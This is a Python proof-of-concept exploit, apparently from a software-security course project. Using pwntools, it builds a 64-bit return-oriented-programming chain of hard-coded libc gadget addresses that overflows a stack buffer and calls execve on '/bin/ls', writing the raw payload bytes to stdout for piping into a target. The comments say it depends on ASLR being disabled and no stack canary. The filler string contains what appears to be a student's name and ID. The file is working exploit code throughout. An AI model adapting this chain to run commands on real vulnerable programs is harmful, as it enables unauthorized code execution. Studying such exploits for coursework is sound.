exploit.py
#!/usr/bin/env python3
# Course-project proof of concept: builds a 64-bit ROP chain for a stack
# overflow and writes the raw bytes to stdout so they can be piped into the
# target. Every address below is hard-coded, so the chain only lines up when
# the process runs at fixed addresses (ASLR disabled / debugger-style
# layout); with ASLR on, the libc and stack values differ per run and the
# chain fails. A stack canary would also stop the overflow before the saved
# return address is reached.
from pwn import *  # supplies p64() and context; `sys` below is presumably re-exported by pwn — verify
context.arch = "amd64"  # p64() packs 8-byte little-endian words for x86-64
OFFSET = 72  # bytes of filler before the saved return address (taken from the target; not derivable here)
buf_addr = 0x7fffffffc270  # assumed stack address where the payload lands — only valid without ASLR
libc_base = 0x7ffff7c00000  # assumed libc load base; the gadget addresses are offsets from it
execve_addr = 0x7ffff7ceef30  # absolute address of libc's execve (written out, not as libc_base + offset)
pop_rdi = libc_base + 0x10f78b  # by its name, a `pop rdi; ret` gadget (1st argument); offset is specific to this libc build
pop_rsi_rbp = libc_base + 0x2b46b  # by its name, `pop rsi; pop rbp; ret` (2nd argument, rbp is a throwaway)
pop_rbx = libc_base + 0x586e4  # by its name, `pop rbx; ret`
mov_rdx_rbx = libc_base + 0xb0153  # by its name, copies rbx into rdx (3rd argument); presumably pops more registers — see the three zero words below
binls_offset = OFFSET + 12*8  # twelve 8-byte chain entries precede the "/bin/ls" string
binls_addr = buf_addr + binls_offset  # where "/bin/ls\x00" will sit on the stack
argv_addr = binls_addr + 8  # the string is followed by [binls_addr, 0], i.e. an argv array
# The filler is exactly 72 characters, matching OFFSET.
chain = b"PRATIK_KAMBLE_B00924004_CS553_SOFTWARE_SECURITY_PROJECT_COMPUTER_SCIENCE"
chain += p64(pop_rdi)
chain += p64(binls_addr)  # rdi = pathname
chain += p64(pop_rsi_rbp)
chain += p64(argv_addr)  # rsi = argv
chain += p64(0)  # rbp (don't care)
chain += p64(pop_rbx)
chain += p64(0)  # rbx = 0, later moved into rdx (envp = NULL)
chain += p64(mov_rdx_rbx)
chain += p64(0) + p64(0) + p64(0)  # presumably consumed by extra pops inside the mov gadget — confirm against the gadget
chain += p64(execve_addr)  # intended call: execve(binls_addr, argv_addr, 0)
chain += b"/bin/ls\x00"  # the pathname, located at binls_addr
chain += p64(binls_addr)  # argv[0]
chain += p64(0)  # argv[1] = NULL terminator
# A newline would presumably end a line-based read early; note that `assert`
# is stripped under `python -O`, so this is a convenience check, not a guarantee.
assert b"\n" not in chain, "invalid payload"
sys.stdout.buffer.write(chain)  # write raw bytes so nothing is re-encoded as text